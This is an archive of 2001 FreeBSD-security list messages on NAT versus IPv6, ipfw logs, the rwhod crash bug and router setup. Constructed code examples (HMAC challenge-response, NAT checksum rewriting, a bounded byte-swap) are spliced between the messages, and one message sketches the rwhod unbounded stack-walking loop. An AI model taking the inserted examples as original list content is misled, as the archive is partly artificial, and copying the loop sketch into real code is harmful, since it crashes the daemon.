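Borja's description quoted above (the button holds the key, the agent sends a challenge, the button answers) and Terje's earlier note that the SHA-1 iButton is the one to use for keyed hashes for authentication describe the same challenge-response exchange. What follows is an added example and not code from the iButton project or from anyone on this thread: a pure-Python simulation of a keyed-hash token, with the host side issuing single-use challenges so that a recorded answer cannot be replayed. The `SimulatedShaToken` and `Host` classes, the token ids and the 20-byte secret are all constructed for the example, not the real DS1963S command set; HMAC-SHA1 is used because it needs nothing outside the standard library, whereas the RSA variant Borja describes would leave the host holding only the public key.

```python
import hashlib
import hmac
import os
from typing import Dict


class SimulatedShaToken:
    """Stand-in for a keyed-hash token such as the SHA-1 iButton mentioned
    on the list (constructed for this example, not the real device's
    command set). The secret is loaded once and never read back; the only
    operation the host can ask for is "answer this challenge"."""

    def __init__(self, secret: bytes) -> None:
        self._secret = secret  # stays inside the token object

    def answer(self, challenge: bytes) -> bytes:
        # Keyed hash over the challenge; HMAC-SHA1 mirrors the SHA-1 button.
        return hmac.new(self._secret, challenge, hashlib.sha1).digest()


class Host:
    """The host side, i.e. what an ssh-agent-like component would do.
    In this symmetric scheme the host holds a copy of each token's secret;
    with the RSA variant it would hold only the public key."""

    def __init__(self, secrets: Dict[str, bytes]) -> None:
        self._secrets = secrets               # token id -> shared secret
        self._pending: Dict[str, bytes] = {}  # token id -> outstanding challenge

    def issue_challenge(self, token_id: str) -> bytes:
        # Fresh random nonce per attempt; verify() consumes it, so a recorded
        # (challenge, answer) pair is useless afterwards.
        nonce = os.urandom(20)
        self._pending[token_id] = nonce
        return nonce

    def verify(self, token_id: str, challenge: bytes, response: bytes) -> bool:
        expected_challenge = self._pending.pop(token_id, None)
        if expected_challenge is None or challenge != expected_challenge:
            return False  # nothing outstanding, or not the nonce we issued
        secret = self._secrets.get(token_id)
        if secret is None:
            return False  # token id was never enrolled
        expected = hmac.new(secret, challenge, hashlib.sha1).digest()
        # Constant-time comparison so a wrong answer leaks no timing information.
        return hmac.compare_digest(expected, response)


def authenticate(host: Host, token: SimulatedShaToken, token_id: str) -> bool:
    """One full exchange: host -> challenge -> token -> answer -> host."""
    challenge = host.issue_challenge(token_id)
    return host.verify(token_id, challenge, token.answer(challenge))


def demo() -> Dict[str, bool]:
    """Constructed scenario: one enrolled token, one impostor, one replay."""
    secret = bytes(range(20))                   # constructed 160-bit secret
    host = Host({"button-1": secret})
    genuine = SimulatedShaToken(secret)
    impostor = SimulatedShaToken(b"\x00" * 20)  # does not know the secret

    results = {
        "genuine": authenticate(host, genuine, "button-1"),
        "impostor": authenticate(host, impostor, "button-1"),
        "unknown_id": authenticate(host, genuine, "button-2"),
    }
    # Replay: present a challenge/answer pair that already succeeded once.
    challenge = host.issue_challenge("button-1")
    answer = genuine.answer(challenge)
    results["first_use"] = host.verify("button-1", challenge, answer)
    results["replay"] = host.verify("button-1", challenge, answer)
    return results


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:10s} {'accepted' if ok else 'rejected'}")
```

The point Terje makes about trust carries over unchanged: the simulation protects the secret only as well as the object holding it, so the replay check and the unknown-id check are the host's part of the bargain, and the tamper response is the token's.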



From owner-freebsd-security  Tue Mar 13  7:40:57 2001
Delivered-To: freebsd-security@freebsd.org
Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2])
	by hub.freebsd.org (Postfix) with ESMTP
	id 84A3937B71B; Tue, 13 Mar 2001 07:40:49 -0800 (PST)
	(envelope-from jwyatt@rwsystems.net)
Received: from bsdie.rwsystems.net([209.197.223.2]) (4509 bytes) by bsdie.rwsystems.net
	via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp
	(sender: <jwyatt@rwsystems.net>) 
	id <m14cqrW-000CCQC@bsdie.rwsystems.net>
	for <FreeBSD-Questions@FreeBSD.ORG>; Tue, 13 Mar 2001 09:37:26 -0600 (CST)
	(Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25)
Date: Tue, 13 Mar 2001 09:37:23 -0600 (CST)
From: James Wyatt <jwyatt@rwsystems.net>
To: Ted Mittelstaedt <tedm@toybox.placo.com>
Cc: Bob Van Valzah <Bob@Talarian.Com>, pW <packetwhore@stargate.net>,
	FreeBSD-Security@FreeBSD.ORG, FreeBSD-Questions@FreeBSD.ORG
Subject: RE: Racoon Problem & Cisco Tunnel
In-Reply-To: <000801c0ab8b$81d99ca0$1401a8c0@tedm.placo.com>
Message-ID: <Pine.BSF.4.10.10103130847370.72725-100000@bsdie.rwsystems.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 12 Mar 2001, Ted Mittelstaedt wrote:
> >-----Original Message-----
> >From: owner-freebsd-questions@FreeBSD.ORG
> >[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Bob Van Valzah
> >Sent: Monday, March 12, 2001 8:07 AM
> >Subject: Re: Racoon Problem & Cisco Tunnel
> >
> >Yes. The five DSL setups with which I'm familiar all grant at least one
> >public address per house. I believe all are static, but one might be
> >dynamic. Interference with protocols like IPSec is one of the reasons
> >why I'd make a public address a requirement when choosing a DSL
> >provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all
> >possible. Let's hasten the deployment of IPv6.
	[ ... ]
> Until I see the large organizations with Class A's tied up, give up those
> numbers back to the pool, I'll fight any attempt to move from IPv4 to IPv6,
> and most other ISP's that are out there are going to fight it as well.  In
> the meantime I'm pushing all my customers into using NAT.  NAT is here to
> stay and people that run around calling it an aberration are just proving to
> the rest of us that they have absolutely no business sense.

NAT is a tool and you can hurt yourself with it or do useful things with
it, not an aberration or silver-bullet. Folks with fast hosts or small
amounts of traffic and simple needs love it - especially home broadband
users. There is a trade-off for many router users though: a) just change
the header when NAT-ting, or b) correct the packet checksums and lose your
ASIC efficiency and kill your shared-CPU. NAT can also make peer-to-peer
networking for groups of workstations across NAT barriers difficult if you
have to chew-up static IPs from what I can tell.

Many large corporations like GE Corp have huge RFC networks internally. If
you ever have to make an internal Frame Relay link between them behind
their public firewalls, you will learn new words for describing RFC
networking limitations. "Oh &$*^^%! Our router thinks their Chicago server
is on the same LAN segment as our Fort Worth server, but with a different
netmask. Which of us should renumber our servers? Can IPSec help this?"

> NAT has proven itself reliable and vital and idiot engineers that design TCP
> protocols that assume everyone has a public IP number are just architecting
> their own failures, and their protocol's subsequent minimizing by the
> market.  I have some sympathy for protocols like IPSec that came to be
> during the same time - but organizational-to-organizational IPSec tunnels
> don't have to pass through the NAT - they can terminate on it.  But, anyone
> doing a new protocol today is a fool if it can't work though a NAT.

When IPv4 was designed, everyone could have had their own number. It was
done a *long* time ago, and did not envision "The Internet Explosion".
Everyone else has just followed the specs so things interoperated. If
those "idiot engineers" hadn't done that, you wouldn't have equipment
coming out your "*rse-h*le" today. (^_^)

btw: If you stopped saying everyone else (including Vint Cerf, however
misguided or misquoted) is an idiot fewer folks might miss your otherwise
valid points. If I get it: "NAT works and IPv6 is still a *long* way off
for many very strong commercial realities." I gotta mostly agree with
that, but NAT has a price as well.

I hate fudging checksums because, while they only cause a little more
coding for script kiddies making fake- or poison-packet generators, they
also help ENet reliability. There are more things hurting packets than
just collisions.

If the world ever decides to jump to IPv6, all the server folks have to
renumber as well. How is this all supposed to happen without massive
outages and downtime? - Jy@
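James's options (a) and (b) above are the one place this thread touches mechanics, so here is an added example, not from any poster on the thread: a source-address rewrite on a constructed IPv4/TCP SYN, done first header-only (his option a) and then with both checksums corrected by the RFC 1624 incremental method (option b, and the form a router can do without re-summing the whole packet). The packet, the addresses (a private source and RFC 5737 documentation ranges) and the helper names are all constructed for this example. The TCP checksum has to move along with the IP one because its pseudo-header covers the addresses.

```python
import socket
import struct
from typing import Dict, Sequence, Tuple


def ones_complement_sum(data: bytes) -> int:
    """16-bit ones-complement sum of data (zero-padded to even length), folded
    into 16 bits. A header whose checksum field is correct sums to 0xFFFF."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def checksum(data: bytes) -> int:
    """Internet checksum (RFC 1071): complement of the ones-complement sum."""
    return (~ones_complement_sum(data)) & 0xFFFF


def incremental_update(old_csum: int, old_words: Sequence[int],
                       new_words: Sequence[int]) -> int:
    """RFC 1624 eq. 3, HC' = ~(~HC + ~m + m'), applied once per changed
    16-bit word. Only the changed words are touched, never the whole packet."""
    acc = (~old_csum) & 0xFFFF
    for m, m_new in zip(old_words, new_words):
        acc += ((~m) & 0xFFFF) + m_new
        acc = (acc & 0xFFFF) + (acc >> 16)  # fold the carry each step
    return (~acc) & 0xFFFF


def ip4(addr: str) -> bytes:
    return socket.inet_aton(addr)


def pseudo_header(src: bytes, dst: bytes, tcp_len: int) -> bytes:
    # src, dst, zero byte, protocol 6 (TCP), TCP length: covered by the TCP checksum
    return src + dst + struct.pack("!BBH", 0, 6, tcp_len)


def build_packet(src: str, dst: str, sport: int, dport: int) -> Tuple[bytes, bytes]:
    """Constructed IPv4 header plus TCP SYN (no options, no payload), both
    checksums computed from scratch. Returns (ip_header, tcp_header)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 0, 5 << 4, 0x02, 65535, 0, 0)
    tcp_csum = checksum(pseudo_header(ip4(src), ip4(dst), len(tcp)) + tcp)
    tcp = tcp[:16] + struct.pack("!H", tcp_csum) + tcp[18:]

    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0x1234, 0x4000,
                     64, 6, 0, ip4(src), ip4(dst))
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip, tcp


def ip_checksum_field(ip: bytes) -> int:
    return struct.unpack("!H", ip[10:12])[0]


def ip_checksum_ok(ip: bytes) -> bool:
    return ones_complement_sum(ip[:20]) == 0xFFFF


def tcp_checksum_ok(ip: bytes, tcp: bytes) -> bool:
    return ones_complement_sum(pseudo_header(ip[12:16], ip[16:20], len(tcp)) + tcp) == 0xFFFF


def nat_rewrite_src(ip: bytes, tcp: bytes, new_src: str,
                    fix_checksums: bool) -> Tuple[bytes, bytes]:
    """Source NAT. fix_checksums=False is option (a), rewrite the header only;
    True is option (b), with both checksums corrected incrementally."""
    old_words = struct.unpack("!HH", ip[12:16])
    new_words = struct.unpack("!HH", ip4(new_src))
    ip = ip[:12] + ip4(new_src) + ip[16:]
    if not fix_checksums:
        return ip, tcp
    ip_csum = incremental_update(ip_checksum_field(ip), old_words, new_words)
    ip = ip[:10] + struct.pack("!H", ip_csum) + ip[12:]
    # Same delta for TCP: its pseudo-header contains the source address.
    tcp_csum = incremental_update(struct.unpack("!H", tcp[16:18])[0], old_words, new_words)
    tcp = tcp[:16] + struct.pack("!H", tcp_csum) + tcp[18:]
    return ip, tcp


def demo() -> Dict[str, object]:
    # Constructed packet: private source behind the NAT, RFC 5737 public addresses.
    ip, tcp = build_packet("10.0.0.2", "198.51.100.9", 40000, 80)
    a_ip, a_tcp = nat_rewrite_src(ip, tcp, "203.0.113.7", fix_checksums=False)
    b_ip, b_tcp = nat_rewrite_src(ip, tcp, "203.0.113.7", fix_checksums=True)
    full = checksum(b_ip[:10] + b"\x00\x00" + b_ip[12:])  # recompute from scratch
    return {
        "original_ok": ip_checksum_ok(ip) and tcp_checksum_ok(ip, tcp),
        "header_only_ok": ip_checksum_ok(a_ip) and tcp_checksum_ok(a_ip, a_tcp),
        "incremental_ok": ip_checksum_ok(b_ip) and tcp_checksum_ok(b_ip, b_tcp),
        "ip_csum_before": ip_checksum_field(ip),
        "ip_csum_after": ip_checksum_field(b_ip),
        "matches_full_recompute": ip_checksum_field(b_ip) == full,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:24s} {value}")
```

The header-only packet fails both checks at the next hop, which is the cost of option (a); the incremental update costs two adds per changed word, which is why it is the form implemented in forwarding hardware rather than the full recompute.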




From owner-freebsd-security  Tue Mar 13  8:39:39 2001
Delivered-To: freebsd-security@freebsd.org
Received: from agora.rdrop.com (agora.rdrop.com [199.2.210.241])
	by hub.freebsd.org (Postfix) with ESMTP id A7D9837B718
	for <security@freebsd.org>; Tue, 13 Mar 2001 08:39:35 -0800 (PST)
	(envelope-from alan@agora.rdrop.com)
Received: (from alan@localhost)
	by agora.rdrop.com (8.11.1/8.11.1) id f2DGeKb08565
	for security@freebsd.org; Tue, 13 Mar 2001 08:40:20 -0800 (PST)
Date: Tue, 13 Mar 2001 08:40:20 -0800
From: Alan Batie <alan@batie.org>
To: security@freebsd.org
Subject: ipfw rule -1?
Message-ID: <20010313084020.A5859@agora.rdrop.com>
Mail-Followup-To: security@freebsd.org
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I'm seeing a few of these in my ipfw log and was wondering what rule -1 is?  
I couldn't find anything about it in the man page...

> ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> ipfw: -1 Refuse TCP 62.29.124.91:97 199.2.210.241:29540 in via etha16
> ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16

-- 
Alan Batie                   ______    www.rdrop.com/users/alan      Me
alan@batie.org               \    /    www.qrd.org         The Triangle
PGPFP DE 3C 29 17 C0 49 7A    \  /     www.pgpi.com   The Weird Numbers
27 40 A5 3C 37 4A DA 52 B9     \/      www.anti-spam.net       NO SPAM!


From owner-freebsd-security  Tue Mar 13  8:44:31 2001
Delivered-To: freebsd-security@freebsd.org
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193])
	by hub.freebsd.org (Postfix) with ESMTP id 8A35C37B718
	for <security@freebsd.org>; Tue, 13 Mar 2001 08:44:27 -0800 (PST)
	(envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost)
	by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id LAA73764;
	Tue, 13 Mar 2001 11:44:24 -0500 (EST)
	(envelope-from wollman)
Date: Tue, 13 Mar 2001 11:44:24 -0500 (EST)
From: Garrett Wollman <wollman@khavrinen.lcs.mit.edu>
Message-Id: <200103131644.LAA73764@khavrinen.lcs.mit.edu>
To: security@freebsd.org
Subject: rwhod
In-Reply-To: <200103122347.f2CNlxT28110@freefall.freebsd.org>
References: <200103122347.f2CNlxT28110@freefall.freebsd.org>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

<<On Mon, 12 Mar 2001 15:47:59 -0800 (PST), FreeBSD Security Advisories <security-advisories@FreeBSD.ORG> said:

> Remote users can cause the rwhod daemon to crash, denying service to
> clients.

It's worth noting that most people who run `rwhod' use it only for
``tourist information'' anyway and do not actually depend on the
information it provides.  I run it on my servers so that the nightly
reports will include the summary of uptimes and load averages, but if
one daemon goes AWOL I'll not be particularly concerned.

If, on the other hand, this bug is actually exploitable, that would be
much more serious (and would warrant a reissue of the advisory).

- -GAWollman


From owner-freebsd-security  Tue Mar 13  9: 1: 6 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.freebsd-corp-net-guide.com (mail.freebsd-corp-net-guide.com [206.29.169.15])
	by hub.freebsd.org (Postfix) with ESMTP
	id 8724137B719; Tue, 13 Mar 2001 09:00:56 -0800 (PST)
	(envelope-from tedm@toybox.placo.com)
Received: from tedm.placo.com (nat-rtr.freebsd-corp-net-guide.com [206.29.168.154])
	by mail.freebsd-corp-net-guide.com (8.11.1/8.11.1) with SMTP id f2DGwFN20651;
	Tue, 13 Mar 2001 08:58:16 -0800 (PST)
	(envelope-from tedm@toybox.placo.com)
From: "Ted Mittelstaedt" <tedm@toybox.placo.com>
To: "James Wyatt" <jwyatt@rwsystems.net>
Cc: "Bob Van Valzah" <Bob@Talarian.Com>,
	"pW" <packetwhore@stargate.net>, <FreeBSD-Security@FreeBSD.ORG>,
	<FreeBSD-Questions@FreeBSD.ORG>
Subject: RE: Racoon Problem & Cisco Tunnel
Date: Tue, 13 Mar 2001 08:58:14 -0800
Message-ID: <000801c0abde$cb31c5a0$1401a8c0@tedm.placo.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0
Importance: Normal
In-Reply-To: <Pine.BSF.4.10.10103130847370.72725-100000@bsdie.rwsystems.net>
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>-----Original Message-----
>From: owner-freebsd-questions@FreeBSD.ORG
>[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of James Wyatt
>
>NAT is a tool and you can hurt yourself with it or do useful things with
>it, not an aberration or silver-bullet. Folks with fast hosts or small
>amounts of traffic and simple needs love it - especially home broadband
>users. There is a trade-off for many router users though: a) just change
>the header when NAT-ting, or b) correct the packet checksums and lose your
>ASIC efficiency and kill your shared-CPU. NAT can also make peer-to-peer
>networking for groups of workstations across NAT barriers difficult if you
>have to chew-up static IPs from what I can tell.
>
>Many large corporations like GE Corp have huge RFC networks internally. If
>you ever have to make an internal Frame Relay link between them behind
>their public firewalls, you will learn new words for describing RFC
>networking limitations. "Oh &$*^^%! Our router thinks their Chicago server
>is on the same LAN segment as our Fort Worth server, but with a different
>netmask.

So what?  Different netmasks create different subnets.  It's perfectly
fine to have 2 different subnets on the same segment.

Now, if you're using the word "segment" to mean something other than a
physical segment, but rather to mean "subnet", then your statement is
impossible.  If both systems have different netmasks (and not the same IP
addresses, of course) then it's impossible for them to be on the same
subnet.  Same physical segment, yes, but not the same subnet.

> Which of us should renumber our servers?

Neither.  Sites that are geographically distant should be on separate
subnets.

>
>When IPv4 was designed, everyone could have had their own number. It was
>done a *long* time ago, and did not envision "The Internet Explosion".
>Everyone else has just followed the specs so things interoperated. If
>those "idiot engineers" hadn't done that, you wouldn't have equipment
>coming out your "*rse-h*le" today. (^_^)
>

The engineers that designed all that weren't idiots - as they emphasized
interoperability.  If someone had come along back then and said "Let's
throw away the IPv4 scheme and replace it with IPv6 because we might run
out of numbers in the future" those engineers would have squashed that
on the interoperability altar.

>btw: If you stopped saying everyone else (including Vint Cerf, however
>misguided or misquoted) is an idiot fewer folks might miss your otherwise
>valid points.

I'm not.  I'm saying that people that insist the problem is we haven't
all switched over to IPv6 are idiots.  I'm also saying that engineers that
sit down TODAY at a blank drawing board, AFTER NAT IS A REALITY, and design
TCP/IP protocols that are incompatible with it are idiots.

The majority of Internet engineers are NOT in this group.  There's a vocal
minority that is and are currently engaged in running around and telling
the majority that we are doing it wrong by using NAT.

>If I get it: "NAT works and IPv6 is still a *long* way off
>for many very strong commercial realities." I gotta mostly agree with
>that, but NAT has a price as well.
>

Any connectivity solution has a price.  NAT's price is cheaper than
the price of renumbering the entire Internet to IPv6 and it will
remain so until we truly are out of numbers, not just dealing with
an artificial shortage.  Sorry, but engineers that ignore this fiscal
reality are idiot dreamers in my opinion.

>I hate fudging checksums because, while they only cause a little more
>coding for script kiddies making fake- or poison-packet generators, they
>also help ENet reliability. There are more things hurting packets than
>just collisions.
>
>If the world ever decides to jump to IPv6, all the server folks have to
>renumber as well. How is this all supposed to happen without massive
>outages and downtime? - Jy@
>

The IPv6 crowd is trying to frame the question as "It's not whether or not
we are going to switch, it's when."  I'm interested to see you framing the
question as "It's not when we are going to switch to IPv6, it's IF."

I'm not even saying that.  All I'm saying is that there is a tremendous
amount that can be done to extend the lifetime of the current
infrastructure; that includes NAT, extracting large public blocks from
corporations that don't use them publicly, and many other things.
I'm saying that it's likely that in our lifetimes the Internet will NOT
be switched over to IPv6.  But, I'm not saying that it will NEVER be.


Ted Mittelstaedt                      tedm@toybox.placo.com
Author of:          The FreeBSD Corporate Networker's Guide
Book website:         http://www.freebsd-corp-net-guide.com


From owner-freebsd-security  Tue Mar 13  9:15:20 2001
Delivered-To: freebsd-security@freebsd.org
Received: from salmon.maths.tcd.ie (salmon.maths.tcd.ie [134.226.81.11])
	by hub.freebsd.org (Postfix) with SMTP id 815D837B719
	for <security@freebsd.org>; Tue, 13 Mar 2001 09:15:17 -0800 (PST)
	(envelope-from iedowse@maths.tcd.ie)
Received: from walton.maths.tcd.ie by salmon.maths.tcd.ie with SMTP
          id <aa18169@salmon>; 13 Mar 2001 17:15:16 +0000 (GMT)
To: Garrett Wollman <wollman@khavrinen.lcs.mit.edu>
Cc: security@freebsd.org, iedowse@maths.tcd.ie
Subject: Re: rwhod 
In-Reply-To: Your message of "Tue, 13 Mar 2001 11:44:24 EST."
             <200103131644.LAA73764@khavrinen.lcs.mit.edu> 
Date: Tue, 13 Mar 2001 17:15:16 +0000
From: Ian Dowse <iedowse@maths.tcd.ie>
Message-ID:  <200103131715.aa18169@salmon.maths.tcd.ie>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <200103131644.LAA73764@khavrinen.lcs.mit.edu>, Garrett Wollman writes:
>
>If, on the other hand, this bug is actually exploitable, that would be
>much more serious (and would warrant a reissue of the advisory).

I am pretty certain that there is nothing exploitable about this
bug. The code ends up doing something like:

	/* p starts out pointing at a local (stack) variable */
	int *p = &local_variable;

	/* no termination condition: nothing in the loop ever stops it */
	for (;;) {
		p[4] = ntohl(p[4]);	/* byte-swap two ints of each 6-int entry */
		p[5] = ntohl(p[5]);
		p += 6;			/* advance one entry (24 bytes) up the stack */
	}

The variable `p' is a register variable in the disassembly I looked
at. So this simply scans forward through the stack byte-swapping
ints, until it reaches inaccessible memory and dies.

Ian

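As an added example (not Ian's code and not the rwhod source), here is the same byte-swap written so that it is bounded by the byte count the receiver actually got, which is what keeps a loop like the one above inside its buffer. The 24-byte entry layout (six 32-bit words, words 4 and 5 in network order) is assumed from the sketch above and is a constructed format, not the real rwhod wire format.

```c
/*
 * Added example, not code from the message or from rwhod itself.
 * Assumed (constructed) layout: the datagram is a run of 24-byte entries,
 * each six 32-bit words, with words 4 and 5 in network byte order.
 */
#include <arpa/inet.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ENTRY_WORDS 6
#define ENTRY_BYTES (ENTRY_WORDS * sizeof(uint32_t))

/*
 * Convert the two network-order words of every complete entry in place.
 * Unlike the for(;;) loop in the message, this stops at the byte count
 * that the receive call returned, so it never walks past the buffer.
 * Returns the number of entries converted, or -1 if len is not a whole
 * number of entries (a truncated datagram is rejected, not half-parsed).
 */
int swap_entries_bounded(uint32_t *buf, size_t len)
{
    if (len % ENTRY_BYTES != 0)
        return -1;
    size_t n = len / ENTRY_BYTES;
    for (size_t i = 0; i < n; i++) {
        uint32_t *e = buf + i * ENTRY_WORDS;   /* start of entry i */
        e[4] = ntohl(e[4]);
        e[5] = ntohl(e[5]);
    }
    return (int)n;
}

/*
 * Build a constructed two-entry datagram with known values stored in
 * network byte order, as it would sit in a receive buffer. Returns the
 * number of bytes written, or 0 if the buffer is too small.
 */
size_t build_sample(uint32_t *buf, size_t cap)
{
    if (cap < 2 * ENTRY_BYTES)
        return 0;
    memset(buf, 0, 2 * ENTRY_BYTES);
    buf[4]  = htonl(1000);   /* entry 0, word 4 */
    buf[5]  = htonl(5);      /* entry 0, word 5 */
    buf[10] = htonl(2000);   /* entry 1, word 4 */
    buf[11] = htonl(60);     /* entry 1, word 5 */
    return 2 * ENTRY_BYTES;
}

int main(void)
{
    uint32_t buf[2 * ENTRY_WORDS];
    size_t len = build_sample(buf, sizeof buf);
    int n = swap_entries_bounded(buf, len);
    printf("entries converted: %d, entry0 word4=%u word5=%u\n",
           n, (unsigned)buf[4], (unsigned)buf[5]);
    /* a datagram 4 bytes short of a whole entry is rejected outright */
    printf("short datagram result: %d\n",
           swap_entries_bounded(buf, len - 4));
    return 0;
}
```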

From owner-freebsd-security  Tue Mar 13  9:31:17 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailgate.kechara.net (mailgate.kechara.net [62.49.139.2])
	by hub.freebsd.org (Postfix) with ESMTP id ECC9B37B718
	for <security@freebsd.org>; Tue, 13 Mar 2001 09:31:11 -0800 (PST)
	(envelope-from lee@kechara.net)
Received: from area57 (lan-fw.kechara.net [62.49.139.3])
	by mailgate.kechara.net (8.9.3/8.9.3) with SMTP id SAA10089
	for <security@freebsd.org>; Tue, 13 Mar 2001 18:41:11 GMT
Message-Id: <200103131841.SAA10089@mailgate.kechara.net>
Date: Tue, 13 Mar 2001 17:35:00 -0000
To: security@freebsd.org
From: Lee Smallbone <lee@kechara.net>
Subject: [OT?] - Central point router
Reply-To: lee@kechara.net
Organization: Kechara Internet
X-Mailer: Opera 5.02 build 856a
X-Priority: 3 (Normal)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii";
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi,

 I'm trying to set up a router (running freebsd) that will allow me to have
 all network traffic on one network segment run through this router. This
 is for purposes of applying global firewall rules, and also for traffic monitoring.
 My setup looks a little something like this:

                         62.xx.139.1
(internet) --- [telco supplied router]
                        |
                        |
                        |
                  [10/100 Switch] ----------- [firewall] ------- (privately addressed LAN)
                   /    |    \
          [server 3]    |     \
        62.xx.139.6     |      \
                        |   [server 1]
                  [server 2]  62.xx.139.4
                 62.xx.139.5


What I'd like to be able to do is have a similar setup, but for it to look like this:

                         62.xx.139.1
(internet) --- [telco supplied router]
                        |
                        |
                        |                    62.xx.139.3
                  [10/100 Switch] ----------- [firewall] ------- (privately addressed LAN)
                        |
                        |
                   62.xx.139.7
        ========[router/firewall]==========
                   /    |    \
          [server 3]    |     \
        62.xx.139.6     |      \
                        |   [server 1]
                  [server 2]  62.xx.139.4
                 62.xx.139.5

 How can I achieve this? Any traffic destined for say, 62.xx.139.5 would have to 
 pass via 62.xx.139.7 first. 
 
 Any help appreciated.

--

Lee Smallbone
Kechara Internet

lee@kechara.net
www.kechara.net 

Tel: (01243) 869 969
Fax: (01243) 866 685


From owner-freebsd-security  Tue Mar 13  9:33:40 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailgate.kechara.net (mailgate.kechara.net [62.49.139.2])
	by hub.freebsd.org (Postfix) with ESMTP id C795237B718
	for <security@freebsd.org>; Tue, 13 Mar 2001 09:33:32 -0800 (PST)
	(envelope-from lee@kechara.net)
Received: from area57 (lan-fw.kechara.net [62.49.139.3])
	by mailgate.kechara.net (8.9.3/8.9.3) with SMTP id SAA10102
	for <security@freebsd.org>; Tue, 13 Mar 2001 18:43:33 GMT
Message-Id: <200103131843.SAA10102@mailgate.kechara.net>
Date: Tue, 13 Mar 2001 17:37:22 -0000
To: security@freebsd.org
From: Lee Smallbone <lee@kechara.net>
Subject: Re: [OT?] - Central point router
Reply-To: lee@kechara.net
Organization: Kechara Internet
X-Mailer: Opera 5.02 build 856a
X-Priority: 3 (Normal)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii";
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

That didn't come out too well...

 If anyone can help, please let me know (from the text description) and I'll mail
 you a txt attachment with a proper 'map'.

 Thanks.

--

Lee Smallbone
Kechara Internet

lee@kechara.net
www.kechara.net 

Tel: (01243) 869 969
Fax: (01243) 866 685


From owner-freebsd-security  Tue Mar 13  9:49:39 2001
Delivered-To: freebsd-security@freebsd.org
Received: from paperbox.gvpl.victoria.bc.ca (paperbox.gvpl.victoria.bc.ca [199.60.107.1])
	by hub.freebsd.org (Postfix) with ESMTP id 1E82A37B718
	for <freebsd-security@FreeBSD.ORG>; Tue, 13 Mar 2001 09:49:32 -0800 (PST)
	(envelope-from scampbel@gvpl.ca)
Received: (from daemon@localhost)
	by paperbox.gvpl.victoria.bc.ca (8.9.3/8.9.3) id JAA61989;
	Tue, 13 Mar 2001 09:48:52 -0800 (PST)
	(envelope-from scampbel@gvpl.ca)
Received: from pochta.gvpl.victoria.bc.ca(199.60.106.7) by paperbox.gvpl.victoria.bc.ca via smap (V2.1/2.1+anti-relay+anti-spam)
	id xma061892; Tue, 13 Mar 01 09:48:31 -0800
Received: from localhost (scampbel@localhost)
	by pochta.gvpl.victoria.bc.ca (8.11.1/8.11.1) with ESMTP id f2DHmXe26929;
	Tue, 13 Mar 2001 09:48:33 -0800 (PST)
	(envelope-from scampbel@pochta.gvpl.victoria.bc.ca)
Date: Tue, 13 Mar 2001 09:48:33 -0800 (PST)
From: Scott Campbell <scampbel@gvpl.ca>
To: James Wyatt <jwyatt@rwsystems.net>
Cc: Will Mitayai Keeso Rowe <mit@mitayai.net>,
	<freebsd-security@FreeBSD.ORG>
Subject: Re: Virus Scanning Software for FreeBSD
In-Reply-To: <Pine.BSF.4.10.10103122000480.72725-100000@bsdie.rwsystems.net>
Message-ID: <Pine.BSF.4.32.0103130922430.24156-100000@pochta.gvpl.victoria.bc.ca>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 12 Mar 2001, James Wyatt wrote:

> I have an eval copy of a product that looks promising: Sophos antivirus.
>
> 	http://www.sophos.com/products/antivirus/savunix.html
>
> You can use the SAVI (API for virus checking) to scan email according to
> the description at:
>
> 	http://www.sophos.com/products/antivirus/savi/
>
